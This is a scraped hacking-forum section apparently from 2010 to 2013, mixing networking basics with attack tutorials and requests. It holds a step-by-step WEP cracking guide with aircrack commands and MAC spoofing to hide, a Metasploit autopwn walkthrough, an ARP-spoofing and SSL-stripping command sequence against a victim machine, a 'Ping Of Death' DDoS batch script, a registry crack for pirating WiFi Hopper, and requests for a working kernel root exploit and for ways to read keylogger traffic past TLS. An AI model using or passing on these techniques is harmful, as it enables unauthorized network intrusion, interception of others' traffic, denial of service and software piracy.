Network Security - iExploit

Should i Buy the Wifu Course?

Xin — Fri, 17 Dec 2010 12:10:47 -0500

Link here: http://www.offensive-security.com/docum ... llabus.pdf

Its basically a training course on wireless hacking, you get 2.5 hours of videos and 300 pages on a ebook pdf + a chance to get certified in the exam. The price is 350$, the cert wont get you recognised really in the employer world but it will give you good knowledge.

Just wandering your thoughts on it?

Transport Layer Security with SMTP

Mr. P-teo — Mon, 07 Jan 2013 13:43:52 -0500

So iv been looking in wireshark at SMTP packets sent to gmail and one thing i noticed was the following.

250-mx.google.com at your service, [ipaddress]

250-SIZE 35882577

250-8BITMIME

250-STARTTLS

250 ENHANCEDSTATUSCODES

STARTTLS

220 2.0.0 Ready to start TLS

I wanted to look further into this as it seems even with standard vb.net keyloggers the simple smtp email is sent and google forces the TLS stoping me from easily viewing the information within the packets. So what can i do to get around this? And where can i learn more about the inner workings of this?

Some networking basics

chroniccommand — Thu, 03 Mar 2011 20:52:29 -0500

[-----------------------------------]
Originally meant for an addon to Xinapses guide
Author: Chroniccommand
I will be continuing with this on my free time. Enjoy.
[-----------------------------------]
Table of Contents:
0x01..OSI Model....
0x02..Sockets......
0x03..Packets......

0x01 OSI Model:
To understand the underlying framework of networking, you must understand the OSI Model. First of all, OSI stands for Open Systems Interconnection. The OSI model is the standard communication system used in networking. It works on layers, layers 1 - 7. I will list the layers and explain them here.

First layer - Physical layer
The first layer is the physical layer. The physical layer deals with actual connections. It deals with things such as cables and communicating between them. The first layer mainly deals with connecting and terminating connections. But it doesn't exactly do the virtual connection. When I say it deals with connections, it deals with the communication between mediums. An example of a medium would be a router.
Subsection: What is a router?
So what exactly is a router? Well a router is just a computer. Yes, a computer. Like the one you're on now. Except it's stripped. It has a minimal Operating System, like BSD. It doesn't have a GUI or anything fancy, nor does it have a monitor. It's a piece of hardware that deals with communicating. Now when you connect to another system, your computer sends a socket to the router. The router uses the physical layer to connect from your computer to the router for computer B. So it would look a little something like this:


|----------|
|Packet A  |   Contains header info etc
|----------|
     |
     |
     |                                        |-----------|
|----------|                                  |Computer B |
|Router A  |                                  |-----------|
|----------|      
     |                                             |
     |                                             |
     |                                             |
|----------------------------------|               |
|Passed through physical data layer| --------> |----------|
|----------------------------------|           |Router B|
                                               |----------|

So computer A sends packet A which contains all info. It is then sent to router A. Router A just sends this packet through the physical data layer to Router B(Of course hitting other places in the process). Router B then identifies the packet and sends it to Computer B.

Anyway, back to the OSI model.
Layer 2 - Data link layer
The second layer in the OSI model is the Data link layer. This layer will transfer data and correct errors in the Physical layer. That's all I'll go into for now with this layer.

Layer 3 - Network layer
The third layer is the Network layer. This layer is another layer I won't go too much into. This layer is responsible for transporting data sequences. It also fragments and re-assembles network connections.

Layer 4 - Transport layer
The fourth layer is the Transport layer. This layer is mainly responsible for transfer of data between end users. TCP and UDP both use this layer, so know this layer!

Layer 5 - Session layer
This layer is the fifth layer. The Session layer. It manages and terminates connections between both remote and local connections. It is also responsible for closing connections in TCP.

Layer 6 - Presentation layer
The sixth layer is the Presentation layer. This is another layer I won't go much into. All you really need to know is that it will provide independence from representation of data.

Layer 7 - Application layer
The seventh and last layer of the OSI model is the Application layer. This layer will interact with network applications. That's the basics of that layer.

If you'd like to learn more about the OSI model, google :p

0x02 Sockets
So what exactly is a socket? You probably hear it all the time when you're talking about networking. But do you really know what it is? Well basically a socket allows bi-directional communication flow. Basically it looks kinda like this.
Socket 1 <------------> Socket 2

Sockets will let you send packets information over a network and lets you communicate. Sockets are the base of every networking application. There are 2 main socket types, and one not so known one.
[list=1]
[*]TCP(Transmission Control Protocol)[/*:m]
[*]UDP(User Datagram Protocol)[/*:m]
[*]Raw[/*:m][/list:o]
Now to go over the basics of each.
TCP
TCP stands for Transmission Control Protocol. TCP is part of the IP(Internet Protocol) suite. TCP provides a reliable connection using sockets. With a TCP socket, data is sent as one continuous stream until the connection is closed. This is more reliable than UDP, as UDP sends data less reliably and it may even lose parts of the message.

UDP
UDP stands for User Datagram Protocol. It works a bit differently from TCP. As I stated above, it sends data less reliably and parts of the message may even be lost. Even though this may happen, UDP has its uses. Some users for UDP are:
[list]
[*]DNS[/*:m]
[*]VoIP[/*:m]
[*]Online games[/*:m][/list:u]

Raw
A raw socket is the most simple type of socket out of the three. Basically it allows sending of data without encapsulating the packet for the Operating System. Basically that's all there is to really know about Raw IP packets.

0x03 IP
IP stands for Internet Protocol. It is used for communication using sockets. It is also responsible for mapping packets across networks. There are currently two major versions of IP
[list]
[*]IPv4[/*:m]
[*]IPv6[/*:m][/list:u]
IPv4 is the first major version. It is currently used the most. An IPv4 address looks like so:

255.255.255.255

This allows for tons of combinations of IP's. Unfortunately, IPv4 addresses are rapidly running out. Mainly because of the boom of mobile devices that require/have internet.

IPv6 is less used, but will soon be used by almost everything as we slowly transition from 4 to 6. IPv6 is a bit more advanced than IPv4. A typical IPv6 address will look something like this:

2001:0db8:85a3:0000:0000:8a2e:0370:7334.

This is of course more hard to remember than

255.255.255.255

Packets
Packets are sent over a socket. Packets contain information such as a header and a body. Much like a letter. Think of it like this.
Computer A crafts a packet with header information and body information. Much like a letter. Computer A sends it over to Computer B. Computer B gets the packet, dissects it and reads the header information, and proceeds to read the body.

Packets are a big part of networking as without packets we couldn't really communicate information.

Security against packets
A typical security issue is Packet sniffing. This involves capturing packets using an MITM(Man In The Middle) attack. The packet is then dissected to get the header and body information. This can be used to see what computer A is doing, since computers send packets to communicate information. This can of course be stumped by SSL. But of course SSL can be stripped.

Another security issue against packets is packet crafting. This involves an MITM attack. The man in the middle(the attacker), crafts a packet and sends it to computer A. Thus tricking computer A to think it's an official packet, even though it's the crafted packet created by the attacker.

Rainbow Tables And Dictionary files used for WPA/WEP cracking

ReverseEngineering — Fri, 14 Sep 2012 21:19:21 -0400

Does anyone know good resources, or direct link for rainbow tables and dictionary files used for WPA/WEP cracking?

"ISA Server/PIX firewall"

McKittrick — Thu, 13 Jan 2011 23:36:07 -0500

just curious, any of you on here ever manged any of these devices? i have read alot on CISCO PIX overall, but have never been in front of one. same goes for MS' ISA server. which one would you say is a better defense in a network environment? i have heard ISA servers have very robust abilities when it comes to drilling-down and delving in deep as far as packet/protocol inspection is concerned. thoughts?

SOMEONE EXPLAIN THIS

McKittrick — Sat, 18 Dec 2010 22:37:10 -0500

this might just be a theory but i have never seen it done so i ask:

if one was to somehow control your local ISPs gateway that managed your entire subnet, would you see all the data that passed through it? the next question, would you have to have some type of ip forwarding in place as not to create a bottleneck and would your machine even be able to keep up? i have heard (in cases involving RIP poisoning) that if you set your interface on the router to 0, you are telling it you are directly connected. you then have precedence over all other traffic, as opposed to it being set at 1. so has this ever been done--full control over an ISP gateway?

i would like to pose another question that relates slightly to the above: has anyone here ever read up on RSVP and how you can use it to manipulate a network into allowing your packets to have priority on the network as far as bandwidth goes?

Metasploit autopwn with nessus

chroniccommand — Sun, 05 Dec 2010 07:47:50 -0500

[-- Intro --]
This is a followup guide to my Nessus scanning guide. In this guide I'll show you how to import a Nessus scanned database into metasploit and execute autopwn to automatically launch an exploit found within Nessus.

[-- Database Work --]
So first we must open up metasploit(msfconsole). Once metasploit is open and loaded we're gonna have to load the .nessus file into metasploit. To do this we're going to first have to connect to a database. To create a database, type:

db_create

Now you have a newly created database. Now to connect to it. Just type:

db_connect

NOTE: Metasploit usually automatically connects you to the newly created database, but type that in case it doesn't.
Now that you're connected you're gonna have to import the .nessus file. To do this you're gonna have to type the following command:

db_import_nessus_xml /home/chronic/nessus_scan.nessus

This should import the .nessus file.
NOTE: If you have a .nbe file, change _xml to _nbe
Now type db_hosts to see the hosts you have in that file to make sure you're autopwn'ing the correct targets.

[-- Aut0pwning --]
Now to actually launch autopwn on the nessus targets. To do this, just type the following command:

db_autopwn -t -e -x -p

It should start running through the autopwn process :)

If all goes well, and it's exploited, you should get a meterpreter :D
If you need any help, feel free to ask

--Chroniccommand

Tunneling Web Traffic through SSH

redd3ath — Wed, 19 Sep 2012 13:24:41 -0400

Tried to check if someone had already wrote a tutorial previously on SSH and surprisingly I didn't find anything so I just thought I'd share this simple tutorial from my website. Basic stuff I know but relevant material for any security ninja or system admin. Also looking for contributors to write tutorials on my site as well! (really more of informational journal to harvest or log material I've learned in order to keep my mind fresh and sober upon it) Just PM me a tutorial you've written if you're interested and we would love to have you aboard with us. I would love to get some feedback from you guys! Thanks in advance! :)

http://intimateintel.net/2012/08/18/tunneling-web-traffic-through-ssh/

ARP Poisoning [PDF]

Sh3llc0d3 — Tue, 19 Apr 2011 02:30:35 -0400

Well this is my work done for today. Simple explanation of ARP Poisoning and attack vectors. Any problems let me know. I'll be adding further papers very soon.

Appropriate links given for more reading.

Enjoy,
Sh3llc0d3

Download: http://www.multiupload.com/QBHR43QRTX

Need a bit of help .

Hardcore-Gabber — Thu, 27 Sep 2012 08:17:04 -0400

Please someone cane give me a working exploit for this kernel . Have tried allot of exploits but could not get root.. All publix exploits are bad or i am dooing something wrong

Apache/2.0.63
(Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 DAV/2
mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
mod_perl/2.0.4 Perl/v5.8.8. PHP/4.4.9

Kernel: Linux 2.6.18-238.el5PAE #1 SMP Thu Jan 13 17:10:20 EST 2011 i686

multiple authentication for Network computers?

mandi — Sun, 17 Apr 2011 16:52:31 -0400

hi guys,this question is just my imagination,
I just need to know the real world possibilities of my idea,

As we know to access a pc in a network we need to provide the login credentials to access the pc

we know these traditional security systems like ACL's,routers,IDS,WAF's,switches are there to protect the network ,but these things are a big problem only to low end hackers,but for high end hackers i dont think these things can fully stop them,so here are some of my question

1))can we place multiple levels of login authentication to a single system on a network?

2)Is it possible to implement in real life?if yes how?

3)Also placing multiple network login schemes provides more security?
is it a good idea ? or just it is a waste of time?i had also heard that these kind of multiple authentication schemes are being used in cloud networks,is it true?(just asking to confirm things :) )

4)Beyond the above mentioned traditional security things
what are the high end security things are being developed for the future?i am much more interested to know the future technologies

I am just posting here to get some ideas :)

hope i will get some ideas ..

How does reverse ip domain check up tool works?

mandi — Tue, 30 Aug 2011 18:39:12 -0400

I am sure most of the pen-testers here has used this tool

"reverse ip domain check-up"

(i.e when we enter the ip address or one of the web-sites name,it displays the name of all the web-sites hosted in it the ip address)

I have been trying to understand the working logic behind this,
but unfortunately i couldn't find it.

i just want to know the working logic of this tool..

As usual i have got some questions regarding this:

1)Is it possible for us to determine the number of web-sites running on a web-server manually?if yes how ?

2) To which level we can trust these information?

3)how does this thing work?

hope i will know the working logic soon :)

ssh_host_key

Hardcore-Gabber — Mon, 07 May 2012 00:51:29 -0400

I have founde this ssh_host_key.pub please someone cane tell me how to connect to it ..

this is half of the key that is inside of the .pub file ..

2048 35 234563469683359904440919395217712953187528757751146433172629440433583992466340263318226001554480144271115821080689289418816416849463661054309577608701743498175668437147876912846006231722960701786526721249685891611904610069733059111406122199240611314419141700456158378471681893487322962704386668188800860488288082949618912232910393926894807669266943805923074421247976594396667040142583105720640549670303944921928566823335527448414355164629916664273585429671452161362548624900057504695829599094921372469477657

[video] BlackHat USA 2010 Jackpotting ATM

mandi — Fri, 26 Aug 2011 17:52:12 -0400

while i am surfing the internet i found out this
hope you guys will enjoy it :)


http://vimeo.com/13841482

cheers:)

Freemind [Video]

Sh3llc0d3 — Sat, 20 Nov 2010 16:06:12 -0500

Short vid on how to use mind mapping with network security... web app security uses are demonstrated, I personally use more for network security.

Enjoy
[align=center][video=youtube]

Cracking WEP

chroniccommand — Sat, 25 Dec 2010 20:23:30 -0500

[Intro]
WEP stands for "Wired Equivalent Privacy". It's a security algorithm for IEEE 802.11 wireless networks. Many home routers use WEP to protect other people from connecting to that network. But of course, we can crack this and get into the router. NOTE: Cracking someones router password is illegal(I think). Don't do it unless it's your own network ;)

[Getting started]
Cracking WEP keys is actually pretty easy. All you need is some tools. Install aircrack-ng.


sudo aptitude install aircrack-ng

It should install all aircrack tools like airmon and airodump etc. Also, you should install macchanger to hide yourself. Now that you have the correct tools, you can get on with the tutorial.
NOTE: BackTrack4 has all the tools you need. I'd recommend installing it and using the tools on there.

[Cracking the WEP]
Now time to actually crack the WEP key. Start with:

sudo airmon-ng

This will list your wireless devices. Mine is on wlan0.


sudo airmon-ng start [interface]

For me, I put wlan0 for interface. This will start monitor mode on wlan0. Now mon0 is enabled. Now we hide your MAC address.


sudo ifconfig mon0 down
sudo macchanger -m 00:11:22:33:44:55 mon0
sudo ifconfig mon0 up

Now mon0's mac is 00:11:22:33:44:55
Now type:


sudo airodump-ng --encrypt wep mon0

You'll get a screen listing BSSID, ESSID, Data#, Encryption type etc.
Now wait a sec and you'll get the available networks for cracking. Exit that screen with ctrl-C to go back to the terminal.
Now to filter networks.


sudo airodump-ng --bssid [bssid] -c [channel] -w [Filename] mon0

For bssid, input the bssid of the network you wish to crack.
For example:

sudo airodump-ng --bssid 01:AF:C7:A4:14:8F  -c 1 -w esponet mon0

Now we must collect data so we can crack it with aircrack-ng.


sudo aireplay-ng -1 0 -a [bssid] -h [mon0 mac] -e [essid] mon0

For mon0 mac, input 00:11:22:33:44:55 (Or whatever you changed mon0's mac to).
Now we need to collect more data. Type:


sudo aireplay-ng -3 -b [bssid] -h [mon0 mac] mon0

Now go to your airodump tab and the #DATA tab should be rising more rapidly.

Now to actually crack the captured data.


sudo aircrack-ng filename.cap

Change filename.cap to something like [esponet.cap] or whatever the network you wish to crack's name is. You should get a window showing keys. Leave that alone and let aircrack do its thing. Once it's done the key will show up. For example:


KEY FOUND! [ 12:34:56:78 ]

The key would be 12345678

Have fun cracking.

--Chroniccommand

Wifi Hopper 1.2 (FULL) Wardriving

zer0day — Thu, 31 Mar 2011 05:40:17 -0400

[align=center]WIFI HOPPER v1.2

Description:

WiFi Hopper is a WLAN utility that combines the features of a Network Discovery and Site Survey tool with a Connection Manager.

Sporting a comprehensive arsenal of network details, filters, RSSI graphing and built-in GPS support, WiFi Hopper is invaluable for identification and advanced characterization of neighboring wireless devices.

Additionally, WiFi Hopper can connect to unsecured, WEP, WPA-PSK and WPA2-PSK networks directly from within the application. With editable network profiles and dedicated Connection Manager execution mode, WiFi Hopper can be used as a significantly more transparent replacement for Windows and manufacturer-provided wireless clients.

Screenshot:

http://i292.photobucket.com/albums/mm25/bktruss/shot_vista.png

1. Download the Trial from HERE
2. Copy and paste the code below into notepad and save as whatever.reg

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\WiFi Hopper]
\"SMInfo\"=\"WiFi Hopper\"
\"INSTInfo\"=\"C:\\Program Files\\WiFi Hopper\"
\"ITInfo\"=hex:c7,de,79,a3,6b,97,58,01,57,93,01,50,96,cd,dd,da,01,d3,dc,b3,4c,c3,\
  88,71
\"UInfo\"=hex:7c,33,d9,1e,c5,e5,c0,c2,87,38,d2,bf,9c,0c,68,19,db,8f,0c,08,c8,f1,\
  e4,5a
\"SInfo\"=hex:db,33,f5,19,6c,17,d8,6f,19,3d,4b,ea,f1,76,e4,45,b3,a5,ee,69,9f,cc,\
  e8,ae

3. Install Wifi Hopper v1.2
4. Run .reg file and click yes
5. Run Wifi Hopper, should be a registered Full version now [/align]

Ping Of Death [Works]

Prariredog — Fri, 10 Jun 2011 02:14:34 -0400

Run in .bat

@echo
:1
ping -n [HOW BIG PACKETS SEND 200 300 EG] [IP/WEBSITE]
/C
goto :1
@echo off

edit -n [insert how much u want to be sent]

Download:
DDOSATTACK
Create Shortcut and hit edit then edit it.

VirusTOTAL:
None
VirusTotalScan

[help] Got strucked in last step of ssl stripping

mandi — Mon, 07 Mar 2011 11:31:52 -0500

Here is the scenaario

my back-track ip(i am using backtrack 4 inside vmware)-- 192.168.12.37
victim ip(windows 7) 192.168.12.40
default gateway 192.168.1.4(windows 2003 server)

sub-net mask for all ip's 255.255.240.0

first i fired up a shell
and typed



echo 1 > /proc/sys/net/ipv4/ip_forward


iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

opened another shell

arpspoof -i eth0 -t 192.168.12.40 192.168.1.4

step 3:

start--->backtrack--->privilegeescalation--->all--->spoofing-->ssl strip

opened the tool and then i typed

sslstrip -a

opened another shell typed

ettertcap -T -q -i -eth0

i am getting errors instead of sucess :(


ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on -eth0...
ERROR : 19, No such device
[ec_capture.c:capture_init:146]

 pcap_open: SIOCGIFHWADDR: No such device

i don't know what is wrong at the last step?

how to rectify this error?

can some one help me?

NetDog

chroniccommand — Fri, 15 Apr 2011 23:38:11 -0400

Here is the first release of NetDog, a light weight version of NetCat. NetDog(or nd) is coded by me, Chroniccommand. If you take a look at the readme, you will see this is not supposed to be used over NetCat. It is merely a light weight solution using Python sockets.
Here are some screenshots:
NetDog main help screen(no arguments given):
[spoiler]
http://i.imgur.com/Lf1Pm.jpg
[/spoiler]
Connecting to localhost, port 80
[spoiler]
http://i.imgur.com/jJ3pY.jpg
[/spoiler]

GET / on localhost
[spoiler]
http://i.imgur.com/50AZf.jpg
[/spoiler]

Using UDP on port 80. Of course doesn't work.
[spoiler]
http://i.imgur.com/0vSzx.jpg
[/spoiler]

Port 80 using IPv6, socket timeout as 10 seconds
[spoiler]
http://i.imgur.com/0TWcH.jpg
[/spoiler]

Simple version screen
[spoiler]
http://i.imgur.com/Q4A9q.jpg
[/spoiler]

Listening on port 1337. This is buggy and probably won't work. Good luck :P
[spoiler]
http://i.imgur.com/AuI0U.jpg
[/spoiler]

Closing listening.
[spoiler]
http://i.imgur.com/2vLPm.jpg
[/spoiler]

Anyway, here is the tar ball of NetDog:
http://poisonhack.info/netdog.tar.gz

The tarball includes all files needed to run NetDog on a *nix and Windows system. For *nix I've included an install script, which you need to run as root. Then you can just run netdog instead of running the pythong script.

Enjoy. And please, please read the README.
--Chroniccommand